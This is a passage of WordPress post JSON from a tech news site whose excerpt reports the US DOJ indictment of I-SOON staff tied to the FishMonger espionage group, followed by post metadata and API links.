src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-12\/welivesecurity-eset-threat-intelligence.jpeg\" alt=\"\" width=\"915\" height=\"296\"\/><\/a><\/p>\n<\/div>\n\n","protected":false},"excerpt":{"rendered":"<p>On March 5th, 2025, the US DOJ unsealed an indictment in opposition to staff of the Chinese language contractor I\u2011SOON for his or her involvement in a number of world espionage operations. These embrace assaults that we beforehand documented and attributed to the FishMonger APT group \u2013 I\u2011SOON\u2019s operational arm \u2013 together with the compromise [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":7683,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[58],"tags":[5900,5901,5902,2130,5903,854],"class_list":["post-7681","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cybersecurity","tag-fishmedley","tag-governments","tag-ngos","tag-operation","tag-tanks","tag-targeting"],"_links":{"self":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts\/7681","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7681"}],"version-history":[{"count":1,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts\/7681\/revisions"}],"predecessor-version":[{"id":7682,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts\/7681\/revisions\/7682"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/media\/7683"}],"wp:attachment":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7681"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7681"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7681"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}<!-- This website is optimized by Airlift. Learn more: https://airlift.net. Template:. Learn more: https://airlift.net. Template: 69d9690a190636c2e0989534. Config Timestamp: 2026-04-10 21:18:02 UTC, Cached Timestamp: 2026-05-09 08:55:44 UTC -->